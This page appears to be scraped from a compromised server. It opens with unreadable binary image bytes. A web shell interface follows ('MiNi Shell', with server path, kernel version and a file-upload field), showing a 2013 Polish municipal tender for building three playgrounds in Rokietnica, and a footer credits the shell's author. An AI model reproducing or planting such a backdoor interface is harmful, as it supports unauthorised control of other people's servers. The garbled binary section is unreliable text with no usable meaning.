JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130717/280218-N-2013.html

<p class="kh_header"><b>Rokietnica: BUDOWA PLACÓW ZABAW W GMINIE ROKIETNICA</b><br>
<b>Numer ogłoszenia: 280218 - 2013; data zamieszczenia: 17.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rokietnica , ul. Golęcińska 1, 62-090 Rokietnica, woj. wielkopolskie, tel. 061 8145251-2 w. 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rokietnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA PLACÓW ZABAW W GMINIE ROKIETNICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 3 części.
   
Część Nr 1 Zamówienia:  Budowa placu zabaw w miejscowości Sobota, 
ul. Boczna dz. nr 67/3 i 67/2 o wymiarach 14m x 20,5m x 17m
Zakres prac obejmuje:
1. Montaż bujaka na sprężynie dla czwórki dzieci wykonany z tworzywa HDPE(lub równoważnego) osadzony trwale w podłożu na stalowej sprężynie - szt. 1,
2. Montaż zestawu zabawowego z drewna klejonego warstwowo, impregnowanego powierzchniowo. Słupy osadzone w gruncie przy pomocy stalowych kotew. Płyty z tworzywa HDPE(lub równoważnego) trójwarstwowe z frezowanymi rysunkami. Elementy stalowe ocynkowane i malowane proszkowo. 
Belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego. 
Zestaw zawiera: wieżę bez dachu, wieżę z dachem, mostek z lin, pajęczynę linową, balkonik, zjeżdżalnię, przeplotnię łukową, wieżę wspinaczkową, drabinkę wejściową, pomost, sklepik,  kładki, podesty , daszki, elementy linowe, elementy łańcuchowe - szt. 1,
3. Montaż huśtawki wagowej wykonanej z belki konstrukcyjnej, drewno wielowarstwowo klejone, siedziska HDPE (lub równoważne), uchwyty ze stali ocynkowanej, malowane proszkowo - szt. 1,
4. Montaż kosza na śmieci z elementów stalowych malowanych proszkowo 
   - szt. 1,
5. Montaż regulaminu na jednej nodze - szt. 1,
6. Budowa ogrodzenia z siatki wraz z furtką ( z zawiasem samozamykającym)   o pow. 72 m, 
7. Montaż ławki z oparciem z elementów stalowych malowanych proszkowo
   - szt. 2,
8. Prace ziemne związane z przygotowaniem terenu i dostarczeniem piasku   pod  urządzenia na głębokości 40 cm.
9. Po ukończeniu robót związanych z montażem urządzeń należy wyrównać istniejący teren, przygotować podłoże i umocnić teren powierzchniowo poprzez  obsiew mieszanką traw.

Część Nr 2 Zamówienia:  Budowa placu zabaw w miejscowości Pawłowice,
ul. Szkolna dz. nr 95 o wymiarach 36m x 10m x 35m x12m
 Zakres prac obejmuje:
1.  Montaż bujaka na sprężynie dla czwórki dzieci wykonany z tworzywa HDPE 
(lub równoważnego) osadzony trwale w podłożu na stalowej sprężynie - szt. 1
2. Montaż zestawu zabawowego z drewna klejonego warstwowo, impregnowanego powierzchniowo. Słupy osadzone w gruncie przy pomocy stalowych kotew. Płyty z tworzywa HDPE ( lub równoważnego) trójwarstwowe z frezowanymi rysunkami. Elementy stalowe ocynkowane i malowane proszkowo. 
Belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego. 
Zestaw zawiera: wieżę bez dachu, wieżę z dachem, mostek z lin, pajęczynę linową, balkonik, zjeżdżalnię, przeplotnię łukową, wieżę wspinaczkową, drabinkę wejściową, pomost, sklepik, kładki, podesty , daszki, elementy linowe - szt. 1
3. Montaż huśtawki wagowej wykonanej z belki konstrukcyjnej, drewno wielowarstwowo klejone, siedziska HDPE ( lub równoważne), uchwyty ze stali ocynkowanej, malowane proszkowo - szt. 1
4. Montaż kosza na śmieci z elementów stalowych malowanych proszkowo - szt. 1
5. Montaż regulaminu na jednej nodze szt. 1
6. Budowa ogrodzenia z siatki wraz z furtką (z zawiasem samozamykającym)  o pow. 93 m 
7. Montaż ławki z oparciem z elementów stalowych malowanych proszkowo
- szt. 2
8. Prace ziemne związane z przygotowaniem terenu i dostarczeniem piasku pod urządzenia na głębokości 40 cm
Po ukończeniu robót związanych z montażem urządzeń należy wyrównać istniejący teren, przygotować podłoże i umocnić teren powierzchniowo poprzez  obsiew mieszanką traw.

Część  Nr 3 Zamówienia: Budowa placu zabaw w miejscowości Kobylniki
 dz. nr 67/2 i 67/1 o wymiarach 15m x 20m 
Zakres prac obejmuje:
1. Montaż bujaka na sprężynie dla czwórki dzieci, wykonany z tworzywa HDPE
 ( lub równoważnego) osadzony trwale w podłożu na stalowej sprężynie - szt. 1,
2. Montaż zestawu zabawowego z drewna klejonego warstwowo, impregnowanego powierzchniowo. Słupy osadzone w gruncie przy pomocy stalowych kotew. Płyty z tworzywa HDPE (lub równoważnego)trójwarstwowe z frezowanymi rysunkami. Elementy stalowe ocynkowane i malowane proszkowo.
Belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego.
Zestaw zawiera: zjeżdżalnię, kładki, podesty , daszki, elementy linowe, trap krótki, równoważnię. 
3. Montaż huśtawki wagowej wykonanej z belki konstrukcyjnej, drewno wielowarstwowo klejone, siedziska HDPE (lub równoważne), uchwyty ze stali ocynkowanej, malowane proszkowo - szt. 1
4. Montaż kosza na śmieci z elementów stalowych malowanych proszkowo
- szt. 1
5. Montaż regulaminu , na jednej nodze - szt. 1
6. Budowa ogrodzenia z siatki wraz z furtką ( z zawiasem samozamykającym) o dł. 70 m 
7. Montaż ławki z oparciem  z elementów stalowych malowanych proszkowo - szt. 1
8. Montaż huśtawki mix wykonana z drewna klejonego warstwowo, impregnowanego powierzchniowo. Słupy osadzone w gruncie przy pomocy stalowych kotew. Elementy stalowe ocynkowane i malowane proszkowo. Siedzisko deseczka - aluminium oblane gumą. Siedzisko koszyczek - konstrukcja aluminiowo stalowa, oblane gumą. Huśtawka przeznaczona zarówno dla dzieci młodszych jak i starszych. Opisywane urządzenie musi posiadać strefę upadkową. szt. 1
9. Montaż małpiego gaju szt.1 - zestaw z drewna bezrdzeniowego, impregnowanego powierzchniowo. Słupy osadzone za pomocą stalowych kotew. Płyty ze sklejki wodoodpornej obustronnie laminowanej wandalo- odpornej. Elementy stalowe malowane proszkowo. Liny stalowe w oplocie polietylenowym, liny do wspinaczki,  zestaw do podciągania, zestaw do przewrotów , drabinka pionowa, przeplotnia pionowa.
10. Prace ziemne związane z przygotowaniem terenu i dostarczeniem piasku pod urządzenia na głębokości 40 cm
11. Po ukończeniu robót związanych z montażem urządzeń należy wyrównać istniejący teren, przygotować podłoże i umocnić teren powierzchniowo poprzez  obsiew mieszanką traw.

W skład wyposażenia placu  zabaw wchodzą  wyroby gotowe, fabrycznie wykończone. Zamawiający dopuszcza urządzenia o innych nazwach niż podane w SIWZ jednak o parametrach technicznych nie gorszych niż posiadają urządzenia wymienione w SIWZ. W takiej sytuacji Zamawiający wymaga złożenia dokumentów potwierdzających, że oferowane urządzenia są co najmniej równoważnikami urządzeń wymienionych w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.22.38.00-4, 45.34.20.00-6, 45.11.12.13-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do postępowania przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia -</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy.
Harmonogram rzeczowo-finansowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu realizacji Umowy może nastąpić tylko za zgodą Zamawiającego w następujących przypadkach:
a)  warunków pogodowych, lub siły wyższej, które uniemożliwią prowadzenie robót budowlanych co zostanie potwierdzone wpisem do dziennika budowy - termin wykonania zamówienia  może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu prac z tego powodu - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania niniejszej Umowy,
b) zamówień dodatkowych, od których mowa w art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, - termin wykonania zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych z tego powodu - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania niniejszej Umowy.
c)  przyczyn zależnych od Zamawiającego, organów władzy publicznej, lub innych osób czy też podmiotów, za których działania nie odpowiada Wykonawca, które spowodują przerwania lub czasowe zawieszenie realizacji zamówienia - termin wykonania zamówienia  może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych z tego powodu - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania niniejszej Umowy
d) wystąpienia  nieprzewidzianych okoliczności formalno - prawnych,
3. Zmiany umowy w formie aneksu do umowy są również możliwe w przypadkach, w których nastąpiła:
-  zmiana urzędowej stawki podatku VAT. W takiej sytuacji do rozliczenia przyjęta zostanie kwota netto i naliczony podatek VAT wg obowiązujących przepisów. Jeżeli wzrost stawki VAT nastąpi po terminie realizacji przewidzianym w umowie, a wykonawca w wyniku zawinionego opóźnienia zobowiązany będzie naliczyć wyższą stawkę VAT koszty wzrostu wartości umowy obciążają Wykonawcę.
4. Strona powołująca się na okoliczność uzasadniającą zmianę terminu wykonania przedmiotu Umowy, obowiązana jest zawiadomić pisemnie drugą Stronę o jej wystąpieniu niezwłocznie, nie później jednak niż w terminie 7 dni od dnia zaistnienia takiego zdarzenia, występując o dokonaniu zmiany umowy, pod rygorem utraty prawa powoływania się na tę okoliczność w terminie późniejszym.
5. Wszelkie zmiany niniejszej Umowy wymagają dla swojej ważności formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.rokietnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rokietnicy
62-090 Rokietnica
ul. Golęcińska 1
pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2013 godzina 09:00, miejsce: Urząd Gminy w Rokietnicy
62-090 Rokietnica
ul. Golęcińska 1
Sekretariat - pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich: Europa inwestująca w obszary wiejskie. Operacja współfinansowana jest ze środków Unii Europejskiej w ramach działania Wdrażanie lokalnych strategii rozwoju - mały projekt Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com